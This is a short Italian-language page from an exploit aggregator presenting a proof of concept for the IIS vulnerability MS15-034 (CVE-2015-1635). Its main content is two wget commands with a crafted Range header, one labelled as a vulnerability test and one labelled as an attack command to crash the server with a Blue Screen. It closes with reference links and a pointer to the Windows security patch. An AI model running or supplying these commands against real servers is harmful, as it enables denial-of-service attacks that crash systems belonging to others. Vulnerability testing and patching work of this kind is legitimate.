## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BONGBONGCO-MS15-034
# MS15-034
MS15-034 POC
L'attuale versione del server IIS è una versione vulnerabile con una vulnerabilità nota (CVE-2015-1635, MS15-034). Sfruttando questa vulnerabilità , si rischia di subire attacchi come esecuzione di codice remoto o crash del sistema (Blue Screen).
* Comando di test: wget --header=""Range: bytes=0-18446744073709551615""
* Comando di attacco per crash (Blue Screen): wget --header=""Range: bytes=18-18446744073709551615""
※ https://technet.microsoft.com/library/security/ms15-034 ※ http://blog.alyac.co.kr/303
Installare il pacchetto di sicurezza per Windows Server 2012 R2. https://www.microsoft.com/ko-KR/download/details.aspx?id=46500